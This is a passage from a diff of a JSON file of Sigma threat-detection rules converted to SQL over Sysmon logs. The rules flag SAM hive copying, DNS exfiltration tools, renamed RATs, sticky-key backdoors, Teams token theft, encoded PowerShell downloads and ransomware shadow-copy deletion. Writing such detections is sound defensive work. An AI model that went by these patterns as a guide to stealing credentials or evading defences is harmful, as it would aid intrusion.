CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "title": "Exports Critical Registry Keys To a File", + "id": 
"82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", - "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Exfiltration and Tunneling Tools 
Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "status": "test", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR 
(CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE 
'%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1176" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "Suspicious Sysmon as Execution Parent", - "id": 
"6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "test", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], "falsepositives": [ - "Unknown" + "Winzip", + "Other self-extractors" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE 
'\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", - "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", + "status": "test", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "status": "test", - "description": "Detects ScreenConnect program starts 
that establish a remote access to that system (not meeting, not remote support)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": 
"proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml 
C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", - "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Legitimate use" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" - ], - "filename": "proc_creation_win_pua_frp.yml" - }, - { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", - "status": 
"test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + 
"title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": 